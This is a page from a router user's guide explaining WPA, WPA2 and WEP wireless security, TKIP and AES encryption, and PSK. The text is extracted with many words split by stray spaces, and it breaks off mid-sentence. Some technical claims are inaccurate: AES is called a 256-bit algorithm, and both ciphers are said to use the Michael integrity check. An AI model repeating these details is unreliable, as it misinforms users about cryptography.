Appendix D Wireless LANs
VMG1312-B Series User’s Guide
345
WPA and WPA2
Wi- Fi Prot ect ed Access ( WPA) is a subset of t he I EEE 802.11i standard. WPA2 (I EEE 802.11i) is a
wireless securit y st andard that defines st ronger encryption, authent ication and key m anagem ent
than WPA.
Key differences between WPA or WPA2 and WEP are im proved data encryption and user
aut hent icat ion.
I f both an AP and t he wireless client s support WPA2 and you have an ext ernal RADI US server, use
WPA2 for st ronger data encryption. I f you don't have an ext ernal RADI US ser ver, you should use
WPA2- PSK ( WPA2- Pre- Shared Key) that only requires a single ( identical) password entered int o
each access point , wireless gat eway and wireless client . As long as t he passwords m atch, a wireless
client will be granted access t o a WLAN.
I f t he AP or t he wireless client s do not suppor t WPA2, j ust use WPA or WPA- PSK depending on
whet her you have an ext ernal RADI US server or not .
Select WEP only when the AP and/ or wireless clients do not support WPA or WPA2. WEP is less
secure than WPA or WPA2.
Encryption
WPA im proves data encrypt ion by using Tem poral Key I ntegrit y Prot ocol ( TKI P) , Message I ntegrit y
Check ( MI C) and I EEE 802.1x. WPA2 also uses TKI P when required for com pat ibility reasons, but
offers st ronger encrypt ion than TKI P wit h Advanced Encrypt ion Standard ( AES) in t he Counter
m ode wit h Cipher block chaining Message authent icat ion code Prot ocol ( CCMP) .
TKI P uses 128- bit keys t hat are dynam ically generated and dist ribut ed by the authent icat ion server.
AES ( Advanced Encr yption Standard) is a block cipher that uses a 256-bit m athem at ical algorit hm
called Rijndael. They both include a per- packet key m ixing function, a Message I ntegrity Check
( MI C) nam ed Michael, an extended initialization vector (I V) with sequencing rules, and a re-keying
m echanism .
WPA and WPA2 regularly change and rotat e t he encryption keys so t hat the sam e encrypt ion key is
never used t wice.
The RADI US server distribut es a Pairw ise Master Key (PMK) key to the AP t hat then set s up a key
hierarchy and m anagem ent system , using t he PMK t o dynam ically generat e unique dat a encryption
keys t o encrypt every dat a packet that is wirelessly com m unicated bet ween the AP and t he wireless
clients. This all happens in t he background autom atically.
The Message I ntegrit y Check (MI C) is designed t o prevent an at t acker from capturing data packet s,
altering them and resending them . The MI C provides a strong m athem atical funct ion in which the
receiver and t he t ransm it t er each com pute and then com pare t he MI C. I f t hey do not m atch, it is
assum ed that the data has been t am pered with and the packet is dropped.
By generat ing unique data encr yption keys for every dat a packet and by creat ing an integrit y
checking m echanism (MI C), wit h TKI P and AES it is m ore difficult to decrypt data on a Wi- Fi
net work than WEP and difficult for an int ruder t o break into the net work.
The encrypt ion m echanism s used for WPA( 2) and WPA(2) -PSK are the sam e. The only difference
bet ween the t wo is that WPA(2)- PSK uses a sim ple com m on password, inst ead of user- specific
credent ials. The com m on-password approach m akes WPA(2) - PSK suscept ible to brut e-force
To Next Page
Loading...
